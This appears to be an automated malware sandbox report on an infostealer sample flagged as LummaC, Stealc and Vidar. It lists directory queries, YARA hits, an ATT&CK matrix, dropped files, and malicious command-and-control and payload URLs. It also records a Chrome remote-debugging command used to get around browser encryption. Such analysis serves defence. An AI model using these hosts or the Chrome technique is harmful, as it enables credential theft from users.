Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE

Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe

Directory queried: number of queries: 3961

Source: Yara match	File source: 00000015.00000003.2731254010.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.2754591529.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.2733750270.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.3158403320.000000000121D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.2847172731.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.2845226823.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2044630050.0000000001683000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4940, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: e708276138.exe PID: 5960, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: e708276138.exe PID: 6304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: e708276138.exe PID: 4484, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: e708276138.exe PID: 2716, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: e708276138.exe PID: 5960, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: e708276138.exe PID: 4484, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: e708276138.exe PID: 6324, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 00000019.00000002.2861182508.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.2815171977.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2633611345.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2858405616.00000000000B1000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2043049111.00000000007F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1717266617.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2044630050.000000000160E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2677024586.0000000000C6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2675232544.00000000000B1000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4940, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: df5dd36577.exe PID: 6216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: df5dd36577.exe PID: 7676, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 4940, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D0C40 sqlite3_bind_zeroblob,	0_2_6C7D0C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D0D60 sqlite3_bind_parameter_name,	0_2_6C7D0D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F8EA0 sqlite3_clear_bindings,	0_2_6C6F8EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6C7D0B40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F6410 bind,WSAGetLastError,	0_2_6C6F6410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F6070 PR_Listen,	0_2_6C6F6070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	0_2_6C6FC050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FC030 sqlite3_bind_parameter_count,	0_2_6C6FC030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F60B0 listen,WSAGetLastError,	0_2_6C6F60B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6822D0 sqlite3_bind_blob,	0_2_6C6822D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F63C0 PR_Bind,	0_2_6C6F63C0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	31 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	41 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Windows Service	2 Bypass User Account Control	11 Deobfuscate/Decode Files or Information	LSASS Memory	22 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Extra Window Memory Injection	4 Obfuscated Files or Information	Security Account Manager	259 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	11 Registry Run Keys / Startup Folder	1 Windows Service	13 Software Packing	NTDS	891 Security Software Discovery	Distributed Component Object Model	Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	Network Logon Script	12 Process Injection	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Scheduled Task/Job	2 Bypass User Account Control	Cached Domain Credentials	381 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	114 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	11 Registry Run Keys / Startup Folder	1 Extra Window Memory Injection	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	121 Masquerading	Proc Filesystem	2 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	381 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 Remote System Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	12 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	42%	ReversingLabs	Win32.Trojan.LummaStealer
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\stories[1].exe	100%	Avira	HEUR/AGEN.1332534
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Avira	TR/Crypt.ZPACK.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\ProgramData\EShineEncoder\EShineEncoder.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\ProgramData\EShineEncoder\EShineEncoder.exe	33%	ReversingLabs
C:\ProgramData\EShineEncoder\sqlite3.dll	0%	ReversingLabs
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	29%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe	37%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\stories[1].exe	3%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	42%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Shine Encoder 1.4.3\CH375DLL.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\Shine Encoder 1.4.3\WinSparkle.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\Shine Encoder 1.4.3\cairogfx.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\Shine Encoder 1.4.3\is-1GO4T.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Shine Encoder 1.4.3\is-AF5PH.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Shine Encoder 1.4.3\is-B7T63.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Shine Encoder 1.4.3\is-H7GRO.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Shine Encoder 1.4.3\is-QVTBC.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Shine Encoder 1.4.3\is-RGF1U.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Shine Encoder 1.4.3\msvcp71.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\Shine Encoder 1.4.3\msvcr71.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	33%	ReversingLabs
C:\Users\user\AppData\Local\Shine Encoder 1.4.3\sqlite3.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\Shine Encoder 1.4.3\uninstall\is-QG72D.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Shine Encoder 1.4.3\uninstall\unins000.exe (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1006431001\stories.exe	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	29%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	42%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	37%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\is-4EM98.tmp\_isetup\_iscrypt.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-4EM98.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	0%	ReversingLabs

Name	IP	Active	Malicious	Reputation
aipinuv.ru	185.208.158.202	true	true	unknown
frogmen-smell.sbs	104.21.80.55	true	false	high
steamcommunity.com	104.102.49.254	true	false	high
plus.l.google.com	142.250.185.78	true	false	high
play.google.com	142.250.186.110	true	false	high
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
www.google.com	142.250.185.68	true	false	high
js.monitor.azure.com	unknown	unknown	false	high
apis.google.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.206/68b591d6548ec281/softokn3.dll	true
http://185.215.113.206/	true
thicktoys.sbs	true
http://185.215.113.43/Zu7JuNko/index.php	true
http://31.214.157.226/rand	false
http://185.215.113.206/68b591d6548ec281/freebl3.dll	true
http://185.215.113.206/68b591d6548ec281/nss3.dll	true
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false
faintbl0w.sbs	true
https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js	false
3xc1aimbl0w.sbs	true
https://play.google.com/log?format=json&hasfast=true	false
https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0	false
300snails.sbs	true
http://185.215.113.206/68b591d6548ec281/vcruntime140.dll	true
http://185.215.113.16/mine/random.exe	false

URLs from Memory and Binaries

Name	Source	Malicious
https://duckduckgo.com/chrome_newtab	e708276138.exe, 00000013.00000003.2575286477.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575565822.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575135608.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2701063972.0000000005999000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2785151734.000000000564B000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2976640514.0000000005ABA000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2977376148.0000000005A58000.00000004.00000800.00020000.00000000.sdmp	false
https://www.gccwebshop.com	shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	false
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000002.2044630050.0000000001683000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575286477.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575565822.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575135608.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2701063972.0000000005999000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2785151734.000000000564B000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2976640514.0000000005ABA000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2977376148.0000000005A58000.00000004.00000800.00020000.00000000.sdmp	false
https://www.easycutpro.com/activation	shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	false
http://www.craftedge.com/activation/greatcut/activate.php?Ahttps://www.craftedge.com/activation/sure	shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	false
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	file.exe, 00000000.00000002.2065174879.0000000023A62000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2044630050.0000000001683000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2608720245.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2738576544.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2827320190.0000000000E9D000.00000004.00000020.00020000.00000000.sdmp	false
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 00000002.00000003.1796255477.0000014104703000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.206/ocal	df5dd36577.exe, 00000019.00000002.2861182508.0000000000D6D000.00000004.00000020.00020000.00000000.sdmp	false
https://frogmen-smell.sbs:443/apiW	e708276138.exe, 00000017.00000002.2955044148.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.206/68b591d6548ec281/mozglue.dllX	file.exe, 00000000.00000002.2044630050.0000000001667000.00000004.00000020.00020000.00000000.sdmp	false
http://www.craftedge.comGTrial	shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	false
